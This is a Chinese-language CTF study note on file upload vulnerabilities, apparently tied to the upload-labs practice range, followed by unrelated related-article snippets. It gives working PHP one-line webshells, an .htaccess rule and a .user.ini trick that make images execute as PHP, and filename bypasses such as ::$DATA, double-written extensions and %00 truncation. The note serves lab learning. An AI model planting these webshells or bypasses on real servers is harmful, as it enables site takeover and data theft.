CTF-Web(3)文件上传漏洞

news2024/12/22 20:46:14

笔记目录

CTF-Web(2)SQL注入
CTF-Web(3)文件上传漏洞

1.WebShell介绍


(1)一句话木马定义

     一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境,而 一句话木马往往只有一行WebShell代码
     作用:
  • 攻击获得网站控制权限
  • 查看、修改、删除网站数据
  • 通过提权漏洞可获得主机权限

(2)一句话木马工作原理

  • eval函数:把字符串按照PHP代码执行,该字符串必须是合法的PHP代码,且必须以分号结尾。
  • $_POST:PHP超全局变量$_GET和$_POST用于收集表单数据。

(3)一句话木马(多整理防止被过滤运行不成功)

①基础版
<?php @eval($_GET['cmd']); ?>
②替代版
<?php @eval($_REQUEST['cmd']);?>
③防过滤版
<script language="php">@eval($_POST['cmd']);</script>
【精选】PHP一句话木马集合_思源湖的鱼的博客-CSDN博客

2.文件上传漏洞介绍


(1)原理

    由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致攻击者能够向某个可通过 Web 访问的目录上传恶意文件,并被脚本解析器执行,这样就可以在远程服务器上执行恶意脚本

(2)文件上传流程

    ①A 客户端javascript 检测 ( 客户端,通常检测扩展名)
    ②B 服务端MIME 类型检测 (请求Content-Type 内容)
    ③C 服务端目录路径检测 (检测跟path 参数相关的内容)
    ④D 服务端文件扩展名检测(检测跟文件extension 相关的内容)
    ⑤E 服务端文件内容检测(检测内容是否合法,如检测十六进制内容)

(3)漏洞分类

注:如果随便上传奇怪文件后缀,不允许上传为文件白名单(只允许几种后缀通过),否则为黑名单 (只允许几种后缀不通过)

(4)漏洞类型判断流程

3.漏洞分类(upload-labs靶场)


(1)JS前端验证突破(pass-01)

①原理
    如客户端上传文件时,可能现在本地JS验证文件类型是否正确再上传
②攻击方式
  • 抓包修改文件名

(2)MIME验证实例(pass-02)

①原理
    服务端对上传文件的Content-Type类型进行检测,判断 是否在 白名单规定内
②攻击方式
  • 抓包修改Content-type类型
注意:文件后缀名变更可能需要修改Content-Type类型,否则

(3)黑名单--特殊后缀名(pass-03)

①原理
    服务端对上传文件名后缀进行检测,判断 是否为禁止文件类型
②攻击方式
  • 文件后缀名字典攻击
    • ASP语言类:.asa .cer .cdx
    • PHP语言类: .php3 .php4 .php5 .phtml
    • .net语言类:.ashx
    • jsp语言类:jspx jspf

(4)黑名单--.htaccess(pass-04)

①原理
    htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法
②攻击方式
  • 上传htaccess文件
<FilesMatch "jpg">                              ###如所有jpg文件解析为php文件
setHandler application/x-httpd-php       
</FilesMatch>

(5)黑名单-- .user.ini(pass-05)

①原理
    php5.3版支持.ini代替.htaccess 此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。
    除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。
②攻击方式
  • 首先构造.user.ini文件,因为.htaccess在黑名单
  auto_prepend_file=a.jpg
  • 然后构造jpg(GIF89a 后期有题目过滤内容) ,此时执行其他php代码都会执行a.jpg内容
GIF89a
<script language='php'>echo 'a.jpg success'; @eval($_POST['pass']);</script>
【当.user.ini不在白名单中,无法上传】
  • 首先构造.user.ini文件
GIF89a
auto_prepend_file=a.jpg
  • 将 Content-Type: application/octet-stream 修改为 Content-Type: image/jpg
    
  • 最后上传图片代码
(6)文件名绕过
  .[空格].
  • .后缀名+ .[空格]. ,最后只剩下.php(仅适用于windows系统)
    
②大小写绕过 (pass-06 ,限Linux
③黑名单-加空格 (pass-07 ,限windows
  • 代码没有对空格过滤,可利用windows系统特性,最终上传的文件被去掉了空格
④黑名单-加点 (pass-08
    由于没有代码: $file_name = deldot($file_name);//删除文件名末尾的点,因此可加点
⑤黑名单-双写绕过 (pass-11
    此处将黑名单文件替换为空字符串, php → pphphp
⑥黑名单-数据流 (pass-09
    没有代码, $file_ext = str_ireplace('::$DATA', '', $file_ext); //去除字符串::$DATA
  • 文件名后加  ::$DATA 标识, 访问时去掉标识即可
(7)白名单-%00截断null(GET) (pass-12,待实现
原理:URL遇到%00自动丢弃  %00+后面字符,因为%00 url解码为null
    此处白名单检测,只允许上传'jpg','png','gif'格式的文件。 但是上传路径是可以控制的,可以使用%00 截断更改地址栏中的上传路径,将后面处理过的文件名进行截断。只能用于php版本低于5.3的。
(8)文件头请求
    思路:首先上传一张简单的图片,然后抓包修改文件名后缀php,并在文件内注入木马(修改文件名+添加代码)。 如果能上传则成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1138898.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

p5.js 状态管理

本文简介 带尬猴&#xff0c;我是德育处主任 原生 canvas 提供了 save() 和 restore() 两个方法去管理画布状态。p5.js 作为一个 canvas 库&#xff0c;也理所当然的提供了状态管理的方法。在 p5.js 里这两个方法叫 push() 和 pop()。 本文主要讲解 p5.js 的 push() 和 pop()…

Q41F-25C软密封球阀型号解析

Q41F-25C型号字母含义解析 Q41F-25C是德特森阀门常用的软密封球阀型号字母分别代表的意思是: Q——代表阀门类型《球阀》 4——代表连接方式《法兰》 1——代表结构形式《浮动式》 F——代表阀座材料《聚四氟乙烯PTFE》 -《分隔键》 25——代表公称压力《2.5MPA》 C——…

Ubuntu编译 PCL 1.13.1 详细流程

Ubuntu编译 PCL 1.13. 详细流程 一、编译环境二、虚拟机准备1. 虚拟机扩容2. 配置交换分区 三、Cmake - gui 生成 MakeFile1. 解决 flann 依赖问题2. 配置 Cmake 四、编译安装1.编译&#xff1a;2. 安装 一、编译环境 Ubuntu&#xff1a;Ubuntu 20.04 VMware&#xff1a;VMwar…

护眼灯亮度多少合适?2023最专业的护眼灯品牌推荐

护眼灯是现在广大台灯消费者使用最多的一个灯具种类&#xff0c;它主要带来了更加柔和的用光环境与护眼效果。而其中&#xff0c;护眼灯的国家级照度又是其挑选的重点&#xff0c;那A级跟AA级具体有啥区别呢&#xff1f;首先&#xff0c;护眼台灯的国家A级或者AA级标准&#xf…

R与Python结合,在安装tensorflow时遇到了报错--尚未解决

在服务器上安装tensorflow时&#xff0c;遇到了一个报错信息&#xff1a; 在网上找到一个类似的错误&#xff08;TensorFlow_error&#xff09;,见下图&#xff0c;但是博主没有给出解决办法。

使用Hystrix实现请求合并,降低服务器并发压力

1.引入Hystrix <dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-starter-netflix-hystrix</artifactId></dependency> 2.在启动类上开启Hystrix功能 EnableHystrix 3.请求合并实现代码 import com…

走进国产机器人领军品牌华数机器人,共探数字化变革魔力

近日&#xff0c;纷享销客举办的“一院两司服务对接会暨走进纷享销客【数字化标杆】游学示范基地活动”在佛山顺利举行&#xff0c;本期活动走进华中数控旗下品牌、国家级专精特新“小巨人”企业华数机器人&#xff0c;特邀佛山华数机器人有限公司常务副总经理杨林、纷享销客广…

Ubuntu 内核降级到指定版本

reference https://www.cnblogs.com/leebri/p/16786685.html 前往此网站&#xff0c;找到所需的内核 https://kernel.ubuntu.com/~kernel-ppa/mainline/ 查看系统架构 dpkg --print-architecture 二、下载安装包 注意&#xff1a;下载除lowlatency以外的deb包 三、安装内核 3…

C++前缀和算法的应用:从栈中取出 K 个硬币的最大面值和 原理源码测试用例

本文涉及的基础知识点 C算法&#xff1a;前缀和、前缀乘积、前缀异或的原理、源码及测试用例 包括课程视频 题目 一张桌子上总共有 n 个硬币 栈 。每个栈有 正整数 个带面值的硬币。 每一次操作中&#xff0c;你可以从任意一个栈的 顶部 取出 1 个硬币&#xff0c;从栈中移除…

【智能座舱】- 汽车产业的变革,电动化是上半场,而智能化则是下半场

“汽车产业的变革,电动化是上半场,而智能化则是下半场”,已成为汽车行业的普遍共识。对于制造业企业,伴随业务发展、长时间的生产经营,往往积淀着海量专业性知识,同时存在知识管理集中化与结构化困难、缺乏系统化知识体系、关键业务知识依靠传授、检索效率低下、精准度不…

STM32的BOOT1和BOOT0查找及配置-都有BOOT1引脚的

STM32 BOOT0和BOOT1引脚查找 STM32是有BOO0和BOOT1的&#xff0c;有的芯片原理图没有标注BOOT1&#xff0c;但是可以正在手册查到BOOT0和BOOT1引脚的。 STM32 BOOT配置方式 1&#xff09;主Flash 主Flash起始地址为0x08000000&#xff0c;它指的是STM32内置Flash&#xff0c;通…

共享办公:一种新型的工作方式

随着互联网技术的发展和创业文化的兴起&#xff0c;越来越多的人选择了在共享办公室工作。共享办公室是一种提供灵活、便捷和经济的工作空间的服务模式&#xff0c;它可以让不同的个人或团队在同一地点共享办公设施和资源。那么&#xff0c;共享办公室是什么&#xff1f;它有什…

TSINGSEE青犀省级高速公路视频上云联网方案:全面实现联网化、共享化、智能化

一、需求背景 随着高速铁路的建设及铁路管理的精细化&#xff0c;原有的模拟安防视频监控系统已经不能满足视频监控需求&#xff0c;越来越多站点在建设时已开始规划高清安防视频监控系统。高速公路视频监控资源非常丰富&#xff0c;需要对其进行综合管理与利用。通过构建监控…

国际腾讯云直播推流配置教程!

云直播的服务本质是一个广播的过程&#xff0c;类似于电视台的直播节目通过有线电视网发送给千家万户。为了完成这个过程&#xff0c;云直播需要有采集和推流设备&#xff08;类似摄像头&#xff09;、云直播服务&#xff08;类似电视台的有线电视网&#xff09;和播放设备&…

银河麒麟v10x86或者arm离线安装服务

银河麒麟v10x86或者arm离线安装服务 最近有个项目&#xff0c;甲方的服务器用的全是国产化服务器银河麒麟&#xff0c;架构是x86的然后也无法连接外网&#xff0c;需要离线安装服务正常思路就是找到离线安装的包&#xff0c;然后拷贝到现场的服务器中进行安装所以问题就在于如…

【计算机网络笔记】Web应用之HTTP协议(涉及HTTP连接类型和HTTP消息格式)

系列文章目录 什么是计算机网络&#xff1f; 什么是网络协议&#xff1f; 计算机网络的结构 数据交换之电路交换 数据交换之报文交换和分组交换 分组交换 vs 电路交换 计算机网络性能&#xff08;1&#xff09;——速率、带宽、延迟 计算机网络性能&#xff08;2&#xff09;…

C++ Qt/VTK装配体组成联动连接杆

效果 关键代码 #include "View3D.h" #include "Axis.h"#include <vtkActor.h> #include <vtkAppendPolyData.h > #include <vtkAreaPicker.h> #include <vtkAxesActor.h> #include <vtkBox.h> #include <vtkCamera.h>…

使用内网穿透本地MariaDB数据库,并实现在公网环境下使用navicat图形化工具

公网远程连接MariaDB数据库【cpolar内网穿透】 文章目录 公网远程连接MariaDB数据库【cpolar内网穿透】1. 配置MariaDB数据库1.1 安装MariaDB数据库1.2 测试局域网内远程连接 2. 内网穿透2.1 创建隧道映射2.2 测试随机地址公网远程访问3. 配置固定TCP端口地址3.1 保留一个固定的…

基于单片机的智能电子鼻的设计

欢迎大家点赞、收藏、关注、评论啦 &#xff0c;由于篇幅有限&#xff0c;只展示了部分核心代码。 技术交流认准下方 CSDN 官方提供的联系方式 文章目录 概要 一、智能电子鼻系统的设计方案1.1智能电子鼻系统的设计思路1.2智能电子鼻系统的设计流程图1.3智能电子鼻系统的硬件数…

软考高项-计算题理解

动态回收期主要是看净现值&#xff0c;仔细看&#xff0c;04年投资了925.93 &#xff0c;05,06合计共有825.59&#xff0c;也就是说2年还不能收完&#xff0c;剩余的部分要2年&#xff08;925.93-428.67-396.92&#xff09;2.27&#xff0c;也就是说这道题选C (6-1.1-0.35-0.05…